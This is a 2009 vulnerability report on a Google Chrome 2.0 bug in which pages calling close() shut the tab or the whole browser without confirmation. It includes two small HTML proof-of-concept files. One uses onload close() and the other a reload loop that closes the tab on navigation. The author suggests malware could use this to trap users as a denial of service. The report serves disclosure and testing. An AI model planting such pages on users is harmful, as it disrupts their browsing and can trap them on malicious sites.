Google Chrome close() issue
VENDOR: http://www.google.com/chrome/
article =http://lostmon.blogspot.com/
2009/07/google-chrome-close-issue.html
##############################
Chrome Version : 2.0.172.33 (Build oficial )
URLs (if applicable) :
Other browsers tested:
Safari 4: OK
Firefox 3.x:OK
IE 7: OK
IE 8: OK
What steps will reproduce the problem?
1 - open a web page
2 - navigate to ther page.
Google chrome automatic closes the tab and if we have
only one tab , it closes the process chrome.
What is the expected result?
google chrome don´t close or prompt for close.
What happens instead?
Google chrome closes the tab or if we have only
one tab it closse too without any confirmation.
###########
Abstract
###########
for test all of this need a instaled web server,
and some patience XDD
#############
tesst 1
#############
Create a new html document and write in:
<html><body onload='close()'></body></html>
save it as test1.html in c:\test\ for testing.
1.1 - Open google Chrome and open it with file handler like
file:///c:/test/test1.html
Chrome does not close the window and nothing apears...
1.2 - Open The file in a trust intranet zone via
htttp://localhost/test/test1.html or via ip
http://192.168.1.100/test/test1.html
Chrome does not close the window and nothing apears...
1.3 - Open hard disk and select c:\test\test1.html rigth
click and open with Google Chrome.
Chrome open and close auth.
if we change to other even like onblur ,with onfocus event
it´s interesting because if we try to use inspector to view
the source code, we click in body tag , and we close inspector
the tab is close too,this only aparently afects,wen we open the
html document with test mode 1.3
so this issue aparently can´t exploit in a remote scenario.
###############
test 2
###############
create a new html file and wirte inside , and save it as
test2.html in the test folder.
<html>
<head></head>
<title>.:[-Google Chrome close() issue PoC By Lostmon-]:.</title>
<body>
<script>
try { CloseCrome(); } catch(e) {
setTimeout("location.reload();",20);
close(); }
</script>
<h2>.:[-Google Chrome close() issue PoC By Lostmon-]:.</h2>
<p>Google Chrome :2.0.172.33 (Build oficial )<br>
WebKit 530.5<br>V8 1.1.10.13<br>
User Agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br>
AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5</p>
</body>
</html>
2.1 - Open it via file protocol handler file:///c:/test/test2.html ,
Chrome does not close the window and nothing aparently apears.
but if we try to navigate to other site like www.google.com
the tab closes auth.
2.2 - Open it in trust web server http://localhost/test/test2.html ,
or http://192.168.1.100/test/test2.html Chrome does not close
the window and nothing aparently apears ;but if we try to navigate
to other site like www.google.com the tab closes auth.
2.3 - Open hard disk and select c:\test\test2.html rigth
click and open with Google Chrome.
Chrome open and close auth.
##############
conclusion
##############
This issue can be a vulnerability , and this can be used for
example to built malwares that can be tramp the browser in a
determinate location and if the user try to look the code
(onfocus)or try to navigate to other site (test2.html)or other
event,the window can close without interaction,them if a
malware or a malicious web page or a browser hijacker can
load as a default web page and them this can be a
Denial Of Service Condition
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....